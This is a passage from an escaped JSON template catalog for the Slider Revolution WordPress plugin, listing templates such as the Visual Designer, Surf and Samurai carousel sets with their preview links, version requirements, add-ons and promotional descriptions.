AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2023-06-05 13:06:26\",\"package\":\"Visual Design One-Pager Package\",\"package_order\":\"1\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"Page Portfolio Site in Just Hours [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-beautiful-one-page-portfolio-site-in-just-hours\\/\",\"guide_img\":\"tutorial\\/Visual-Design-One-Pager.png\",\"active\":\"1\",\"package_id\":\"64\",\"installed\":false},\"701\":{\"id\":\"744\",\"title\":\"Visual Designer Portfolio\",\"alias\":\"Visual-Designer-Portfolio\",\"zip\":\"packs\\/Visual-Designer-Portfolio.zip\",\"uid\":\"d53dbb86df1fca5ac940eb98a045b7f7\",\"img\":\"Visual-Designer-Portfolio\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/visual-design-one-page-portfolio-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=visual-design-one-page-portfolio-template\",\"version\":\"1.0.0\",\"required\":\"6.6.14\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Whether you are a web designer, AI artist, 3D designer, digital illustrator, UI\\/UX designer, or photographer, this template is designed to showcase your work in the most impressive way.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Slider Package\",\"filter\":[\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-mousetrap-addon\\\\\\/revslider-mousetrap-addon.php\\\",\\\"name\\\":\\\"Mousetrap AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2023-06-05 13:08:57\",\"package\":\"Visual Design One-Pager Package\",\"package_order\":\"2\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"Page Portfolio Site in Just Hours [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-beautiful-one-page-portfolio-site-in-just-hours\\/\",\"guide_img\":\"tutorial\\/Visual-Design-One-Pager.png\",\"active\":\"1\",\"package_id\":\"64\",\"installed\":false},\"702\":{\"id\":\"745\",\"title\":\"Visual Designer About\",\"alias\":\"Visual-Designer-About\",\"zip\":\"packs\\/Visual-Designer-About.zip\",\"uid\":\"0968eb1bf48e95ddccc9fb7555752099\",\"img\":\"Visual-Designer-About\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/visual-design-one-page-portfolio-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=visual-design-one-page-portfolio-template\",\"version\":\"1.0.0\",\"required\":\"6.6.14\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Whether you are a web designer, AI artist, 3D designer, digital illustrator, UI\\/UX designer, or photographer, this template is designed to showcase your work in the most impressive way.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Slider Package\",\"filter\":[\"hero\"],\"plugin_require\":null,\"date\":\"2023-06-05 13:10:45\",\"package\":\"Visual Design One-Pager Package\",\"package_order\":\"3\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"Page Portfolio Site in Just Hours [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-beautiful-one-page-portfolio-site-in-just-hours\\/\",\"guide_img\":\"tutorial\\/Visual-Design-One-Pager.png\",\"active\":\"1\",\"package_id\":\"64\",\"installed\":false},\"703\":{\"id\":\"746\",\"title\":\"Visual Designer Footer\",\"alias\":\"visual-designer-footer\",\"zip\":\"packs\\/visual-designer-footer.zip\",\"uid\":\"e6027c38009d73cf8ddaeb70ea48d8a8\",\"img\":\"visual-designer-footer\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/visual-design-one-page-portfolio-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=visual-design-one-page-portfolio-template\",\"version\":\"1.0.0\",\"required\":\"6.6.14\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Whether you are a web designer, AI artist, 3D designer, digital illustrator, UI\\/UX designer, or photographer, this template is designed to showcase your work in the most impressive way.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Slider Package\",\"filter\":[\"hero\"],\"plugin_require\":null,\"date\":\"2023-06-05 13:12:21\",\"package\":\"Visual Design One-Pager Package\",\"package_order\":\"4\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"Page Portfolio Site in Just Hours [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-beautiful-one-page-portfolio-site-in-just-hours\\/\",\"guide_img\":\"tutorial\\/Visual-Design-One-Pager.png\",\"active\":\"1\",\"package_id\":\"64\",\"installed\":false},\"704\":{\"id\":\"747\",\"title\":\"Visual Designer Detail View\",\"alias\":\"Visual-Designer-Detail-View\",\"zip\":\"packs\\/Visual-Designer-Detail-View.zip\",\"uid\":\"1faa6ce0fc43a08f3800acace5eb2925\",\"img\":\"Visual-Designer-Detail-View\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/visual-design-one-page-portfolio-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=visual-design-one-page-portfolio-template\",\"version\":\"1.0.0\",\"required\":\"6.6.14\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Whether you are a web designer, AI artist, 3D designer, digital illustrator, UI\\/UX designer, or photographer, this template is designed to showcase your work in the most impressive way.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Slider Package\",\"filter\":[\"slider\"],\"plugin_require\":null,\"date\":\"2023-06-05 13:14:05\",\"package\":\"Visual Design One-Pager Package\",\"package_order\":\"5\",\"package_parent\":\"\",\"modal\":\"1\",\"additions\":\"\",\"guide_title\":\"Page Portfolio Site in Just Hours [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-beautiful-one-page-portfolio-site-in-just-hours\\/\",\"guide_img\":\"tutorial\\/Visual-Design-One-Pager.png\",\"active\":\"1\",\"package_id\":\"64\",\"installed\":false},\"705\":{\"id\":\"748\",\"title\":\"Online Watch Shop Slider\",\"alias\":\"online-watch-shop-slider\",\"zip\":\"online-watch-shop-slider.zip\",\"uid\":\"bbe52119b342d63ead804a91e2ade96d\",\"img\":\"online-watch-shop-slider\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/online-watch-shop-slider\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=online-watch-shop-slider\",\"version\":\"1.0.0\",\"required\":\"6.6.14\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">The \\\"Online Watch Shop Slider\\\" is a stunning design tailored specifically for watch retailers and enthusiasts. With its sleek and modern layout, this template allows you to showcase your collection of timepieces in a visually captivating manner. Featuring smooth transitions and customizable slides, this template provides a seamless browsing experience for your customers, making it an ideal choice for online watch shops aiming to leave a lasting impression.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Revolution Base\",\"filter\":[\"slider\",\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-mousetrap-addon\\\\\\/revslider-mousetrap-addon.php\\\",\\\"name\\\":\\\"Mousetrap AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2023-06-12 08:36:33\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Create a Product Comparison Slider for Your Shop\\u2019s Home Page [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-product-comparison-slider-for-your-shop-s-home-page\\/\",\"guide_img\":\"tutorial\\/Online-Watch-Shop-Slider.png\",\"active\":\"1\",\"installed\":false},\"706\":{\"id\":\"749\",\"title\":\"Brewery Website Slider Template\",\"alias\":\"Brewery-Website-Slider-Template\",\"zip\":\"Brewery-Website-Slider-Template.zip\",\"uid\":\"bcf9213d1ba9c2c41382433c124adf30\",\"img\":\"Brewery-Website-Slider-Template\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/brewery-website-slider-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=brewery-website-slider-template\",\"version\":\"1.0.0\",\"required\":\"6.6.14\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">The Brewery Website Slider Template offers a visually appealing and versatile design, perfect for showcasing the unique offerings of any brewery. With its captivating imagery, smooth transitions, and customizable elements, this template creates an engaging experience that entices visitors to explore the brewery\'s story and discover its exceptional brews. <\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Premium\",\"filter\":[\"slider\",\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-transitionpack-addon\\\\\\/revslider-transitionpack-addon.php\\\",\\\"name\\\":\\\"Advanced Transitions AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2023-06-23 11:27:46\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Market Drink Products with a Stylish Slider [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-market-drink-products-with-a-stylish-slider\\/\",\"guide_img\":\"tutorial\\/Brewery-Website-Slider-Template.png\",\"active\":\"1\",\"installed\":false},\"707\":{\"id\":\"750\",\"title\":\"Hero Slider with Midjourney Image Effect\",\"alias\":\"Hero-Slider-with-Midjourney-Image-Effect\",\"zip\":\"Hero-Slider-with-Midjourney-Image-Effect.zip\",\"uid\":\"45db238a0a64622e4d39f1993106d5e6\",\"img\":\"Hero-Slider-with-Midjourney-Image-Effect\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/hero-slider-with-midjourney-image-effect\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=hero-slider-with-midjourney-image-effect\",\"version\":\"1.0.2\",\"required\":\"6.6.14\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Experience the magic of our new Hero Slider template, featuring the innovative Midjourney Image Effect. This unique template brings the style of an action movie poster to your website, offering an interactive intro that iss sure to captivate visitors. The Midjourney Image sequence, with its subtle variations, adds a dynamic touch, making your website stand out.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Premium\",\"filter\":[\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-mousetrap-addon\\\\\\/revslider-mousetrap-addon.php\\\",\\\"name\\\":\\\"Mousetrap AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"},{\\\"path\\\":\\\"revslider-transitionpack-addon\\\\\\/revslider-transitionpack-addon.php\\\",\\\"name\\\":\\\"Advanced Transitions AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2023-06-28 13:47:30\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Design a High Impact Image for Your Fitness Website\\u2019s Home Page [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-design-a-high-impact-image-for-your-fitness-website-s-home-page\\/\",\"guide_img\":\"tutorial\\/Hero-Slider-with-Midjourney-Image-Effect.png\",\"active\":\"1\",\"installed\":false,\"is_new\":true},\"708\":{\"id\":\"751\",\"title\":\"Highlight Hero Section Template\",\"alias\":\"Highlight-Hero-Section-Template\",\"zip\":\"Highlight-Hero-Section-Template.zip\",\"uid\":\"e16c375827f3c54cdd224ef612e3e31a\",\"img\":\"Highlight-Hero-Section-Template\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/highlight-hero-section-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=highlight-hero-section-template\",\"version\":\"1.0.0\",\"required\":\"6.6.14\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Introducing the Highlight Hero Section Template for Slider Revolution. Make a bold first impression with stunning visuals and seamless animations. Customize every aspect effortlessly and engage your visitors instantly. Elevate your website with this remarkable template.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Premium\",\"filter\":[\"slider\",\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-mousetrap-addon\\\\\\/revslider-mousetrap-addon.php\\\",\\\"name\\\":\\\"Mousetrap AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2023-07-06 10:07:35\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Attract Customers to Your Store with a Highlight Hero Section [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-attract-customers-to-your-store-with-a-highlight-hero-section\\/\",\"guide_img\":\"tutorial\\/Highlight-Hero-Section-Template.png\",\"active\":\"1\",\"installed\":false},\"709\":{\"id\":\"752\",\"title\":\"Samurai Fullscreen Carousel Template\",\"alias\":\"Samurai-Fullscreen-Carousel-Template\",\"zip\":\"Samurai-Fullscreen-Carousel-Template.zip\",\"uid\":\"8b5c5483aa54c09be24bb18a20ec98a5\",\"img\":\"Samurai-Fullscreen-Carousel-Template\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/samurai-fullscreen-carousel-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=samurai-fullscreen-carousel-template\",\"version\":\"1.0.0\",\"required\":\"6.6.14\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Experience the power of our Samurai Fullscreen Carousel Template. With large, bold captions, call-to-action buttons, and tab navigation, it iss a visual feast. Seamlessly pan across a panorama of samurai warriors, thanks to Midjourneys new \\\"pan\\\" feature.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Premium\",\"filter\":[\"carousel\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-thecluster-addon\\\\\\/revslider-thecluster-addon.php\\\",\\\"name\\\":\\\"Slider Revolution The Cluster AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2023-07-10 12:21:25\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Create a Beautiful Fullscreen Product Carousel [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-beautiful-fullscreen-product-carousel\\/\",\"guide_img\":\"tutorial\\/Samurai-Fullscreen-Carousel-Template.png\",\"active\":\"1\",\"installed\":false},\"710\":{\"id\":\"753\",\"title\":\"Surf Scroll Based Story Template\",\"alias\":\"surf-scroll-based-story-template\",\"zip\":\"\",\"uid\":\"surf-scroll-based-story-template\",\"img\":\"packages\\/surf-scroll-based-story-template.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/surf-scroll-based-story-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=surf-scroll-based-story-template\",\"version\":\"1.0.0\",\"required\":\"6.6.15\",\"width\":\"1240\",\"height\":\"800\",\"description\":\"<span class=\\\"ttm_content\\\">Dive into the world of immersive storytelling with the \\\"Surf Scroll Based Story Template\\\" for Slider Revolution! Take your website visitors on an unforgettable journey through the waves of creativity and engage them like never before.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Slider Package\",\"filter\":[\"website\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-mousetrap-addon\\\\\\/revslider-mousetrap-addon.php\\\",\\\"name\\\":\\\"Mousetrap AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2023-08-04 10:45:39\",\"package\":\"Surf Scroll Based Story Template Package\",\"package_order\":\"0\",\"package_parent\":\"true\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Use Lifestyle Imagery to Shape Your eCommerce Brand\\u2019s Identity [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-use-lifestyle-imagery-to-shape-your-ecommerce-brand-s-identity\\/\",\"guide_img\":\"tutorial\\/surf-scroll-based-story-template.png\",\"active\":\"1\",\"package_id\":\"65\",\"installed\":false},\"711\":{\"id\":\"754\",\"title\":\"Surf Template Logo\",\"alias\":\"Surf-Template-Logo\",\"zip\":\"packs\\/Surf-Template-Logo.zip\",\"uid\":\"8bf655d46efa183455bffc8ea5ddd18f\",\"img\":\"Surf-Template-Logo\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/surf-scroll-based-story-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=surf-scroll-based-story-template\",\"version\":\"1.0.0\",\"required\":\"6.6.15\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Dive into the world of immersive storytelling with the \\\"Surf Scroll Based Story Template\\\" for Slider Revolution! Take your website visitors on an unforgettable journey through the waves of creativity and engage them like never before.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Slider Package\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"2023-08-04 10:48:52\",\"package\":\"Surf Scroll Based Story Template Package\",\"package_order\":\"0\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Use Lifestyle Imagery to Shape Your eCommerce Brand\\u2019s Identity [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-use-lifestyle-imagery-to-shape-your-ecommerce-brand-s-identity\\/\",\"guide_img\":\"tutorial\\/surf-scroll-based-story-template.png\",\"active\":\"1\",\"package_id\":\"65\",\"installed\":false},\"712\":{\"id\":\"755\",\"title\":\"Surf Template 1\",\"alias\":\"Surf-Template-1\",\"zip\":\"packs\\/Surf-Template-1.zip\",\"uid\":\"4a532d7cbbe52544f41a6a81023a3879\",\"img\":\"Surf-Template-1\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/surf-scroll-based-story-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=surf-scroll-based-story-template\",\"version\":\"1.0.0\",\"required\":\"6.6.15\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Dive into the world of immersive storytelling with the \\\"Surf Scroll Based Story Template\\\" for Slider Revolution! Take your website visitors on an unforgettable journey through the waves of creativity and engage them like never before.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Slider Package\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-mousetrap-addon\\\\\\/revslider-mousetrap-addon.php\\\",\\\"name\\\":\\\"Mousetrap AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2023-08-04 10:52:16\",\"package\":\"Surf Scroll Based Story Template Package\",\"package_order\":\"1\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Use Lifestyle Imagery to Shape Your eCommerce Brand\\u2019s Identity [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-use-lifestyle-imagery-to-shape-your-ecommerce-brand-s-identity\\/\",\"guide_img\":\"tutorial\\/surf-scroll-based-story-template.png\",\"active\":\"1\",\"package_id\":\"65\",\"installed\":false},\"713\":{\"id\":\"756\",\"title\":\"Surf Template 2\",\"alias\":\"Surf-Template-2\",\"zip\":\"packs\\/Surf-Template-2.zip\",\"uid\":\"7d76218ed2d5144b9dcc0669bb3e346a\",\"img\":\"Surf-Template-2\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/surf-scroll-based-story-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=surf-scroll-based-story-template\",\"version\":\"1.0.0\",\"required\":\"6.6.15\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Dive into the world of immersive storytelling with the \\\"Surf Scroll Based Story Template\\\" for Slider Revolution! Take your website visitors on an unforgettable journey through the waves of creativity and engage them like never before.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Slider Package\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-mousetrap-addon\\\\\\/revslider-mousetrap-addon.php\\\",\\\"name\\\":\\\"Mousetrap AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2023-08-04 10:54:13\",\"package\":\"Surf Scroll Based Story Template Package\",\"package_order\":\"2\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Use Lifestyle Imagery to Shape Your eCommerce Brand\\u2019s Identity [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-use-lifestyle-imagery-to-shape-your-ecommerce-brand-s-identity\\/\",\"guide_img\":\"tutorial\\/surf-scroll-based-story-template.png\",\"active\":\"1\",\"package_id\":\"65\",\"installed\":false},\"714\":{\"id\":\"757\",\"title\":\"Surf Template 3\",\"alias\":\"Surf-Template-3\",\"zip\":\"packs\\/Surf-Template-3.zip\",\"uid\":\"a42b54df91b2c3987bbe22280c26b40d\",\"img\":\"Surf-Template-3\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/surf-scroll-based-story-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=surf-scroll-based-story-template\",\"version\":\"1.0.0\",\"required\":\"6.6.15\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Dive into the world of immersive storytelling with the \\\"Surf Scroll Based Story Template\\\" for Slider Revolution! Take your website visitors on an unforgettable journey through the waves of creativity and engage them like never before.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Slider Package\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-mousetrap-addon\\\\\\/revslider-mousetrap-addon.php\\\",\\\"name\\\":\\\"Mousetrap AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2023-08-04 10:56:13\",\"package\":\"Surf Scroll Based Story Template Package\",\"package_order\":\"3\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Use Lifestyle Imagery to Shape Your eCommerce Brand\\u2019s Identity [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-use-lifestyle-imagery-to-shape-your-ecommerce-brand-s-identity\\/\",\"guide_img\":\"tutorial\\/surf-scroll-based-story-template.png\",\"active\":\"1\",\"package_id\":\"65\",\"installed\":false},\"715\":{\"id\":\"758\",\"title\":\"Surf Template 4\",\"alias\":\"Surf-Template-4\",\"zip\":\"packs\\/Surf-Template-4.zip\",\"uid\":\"017fb0dca11e63421427315718464823\",\"img\":\"Surf-Template-4\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/surf-scroll-based-story-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=surf-scroll-based-story-template\",\"version\":\"1.0.0\",\"required\":\"6.6.15\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Dive into the world of immersive storytelling with the \\\"Surf Scroll Based Story Template\\\" for Slider Revolution! Take your website visitors on an unforgettable journey through the waves of creativity and engage them like never before.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Slider Package\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-mousetrap-addon\\\\\\/revslider-mousetrap-addon.php\\\",\\\"name\\\":\\\"Mousetrap AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2023-08-04 10:58:06\",\"package\":\"Surf Scroll Based Story Template Package\",\"package_order\":\"4\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Use Lifestyle Imagery to Shape Your eCommerce Brand\\u2019s Identity [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-use-lifestyle-imagery-to-shape-your-ecommerce-brand-s-identity\\/\",\"guide_img\":\"tutorial\\/surf-scroll-based-story-template.png\",\"active\":\"1\",\"package_id\":\"65\",\"installed\":false},\"716\":{\"id\":\"759\",\"title\":\"50\\/50 Split Screen Website Design\",\"alias\":\"50-50-Split-Screen-Website-Design\",\"zip\":\"50-50-Split-Screen-Website-Design.zip\",\"uid\":\"e524d518ac23d3f408fca3caddf2dac3\",\"img\":\"50-50-Split-Screen-Website-Design\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/split-screen-website-design\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=split-screen-website-design\",\"version\":\"1.0.1\",\"required\":\"6.6.15\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Introducing the 50\\/50 Split Screen Website Design template: A dynamic showcase that seamlessly balances content and visuals. With a sleek half-and-half layout, captivate your audience with contrasting elements while delivering a clear and engaging message. Customize effortlessly and elevate your web presence with this modern, user-friendly design, only with Slider Revolution.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Premium\",\"filter\":[\"slider\",\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-mousetrap-addon\\\\\\/revslider-mousetrap-addon.php\\\",\\\"name\\\":\\\"Mousetrap AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2023-08-08 12:22:38\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Design a Unique Split Screen Layout for Your Homepage [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-design-a-unique-split-screen-layout-for-your-homepage\\/\",\"guide_img\":\"tutorial\\/50-50-Split-Screen-Website-Design.png\",\"active\":\"1\",\"installed\":false,\"is_new\":true},\"717\":{\"id\":\"760\",\"title\":\"Food Presentation Template Slider\",\"alias\":\"Food-Presentation-Template-Slider\",\"zip\":\"Food-Presentation-Template-Slider.zip\",\"uid\":\"7ebe00aee026ff7baeffaad909e6ee24\",\"img\":\"Food-Presentation-Template-Slider\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/food-presentation-template-slider\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=food-presentation-template-slider\",\"version\":\"1.0.0\",\"required\":\"6.6.15\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Unveil the essence of your cuisine with the \\\"Food Presentation Template Slider.\\\" Elevate your dishes through seamless transitions, vibrant imagery, and enticing descriptions in this captivating slider. Engage your audience, tantalize their taste buds, and showcase your culinary artistry effortlessly. Now available in the Slider Revolution template library.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Premium\",\"filter\":[\"slider\",\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-transitionpack-addon\\\\\\/revslider-transitionpack-addon.php\\\",\\\"name\\\":\\\"Advanced Transitions 